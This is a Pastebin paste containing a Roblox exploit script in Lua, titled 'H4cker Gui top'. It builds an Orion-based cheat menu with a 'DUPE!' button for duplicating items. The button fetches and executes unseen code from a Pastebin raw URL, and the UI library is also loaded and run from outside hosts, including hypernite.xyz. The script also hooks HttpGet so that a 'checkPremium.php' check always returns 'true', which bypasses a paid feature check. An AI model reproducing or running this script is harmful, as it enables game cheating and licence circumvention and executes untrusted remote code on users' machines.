DuperBsd

H4cker Gui top

May 26th, 2023 (edited)
565
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.04 KB | None | 0 0
  1. local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/source')))()
  2.  
  3. local Window = OrionLib:MakeWindow({Name = "BADGEFFHUB Premium", HidePremium = false, SaveConfig = true, ConfigFolder = "OrionTest"})
  4. local Tab = Window:MakeTab({
  5. Name = "Dupe",
  6. Icon = "rbxassetid://4483345998",
  7. PremiumOnly = false
  8. })
  9. OrionLib:MakeNotification({
  10. Name = "Wait!",
  11. Content = "Wait 5 seconds after pressing dupe button!",
  12. Image = "rbxassetid://4483345998",
  13. Time = 10
  14. })
  15. Tab:AddButton({
  16. Name = "DUPE!",
  17. Callback = function()loadstring(game:HttpGet("https://pastebin.com/raw/FL8LEszx"))()
  18. print("button pressed")
  19. end
  20. })
  21. local httpHook;
  22. httpHook = hookfunction(game.HttpGet, function(self,...)
  23. local Args = {...}
  24. if Args[1] and type(Args[1]) == "string" then
  25. if Args[1]:match("checkPremium.php") then
  26. return "true"
  27. end
  28. end
  29. return httpHook(self,...)
  30. end)
  31.  
  32. local OrionLib = loadstring(game:HttpGet(('https://hypernite.xyz/Backup/Orion/source.lua')))()
Advertisement
Add Comment
Please, Sign In to add comment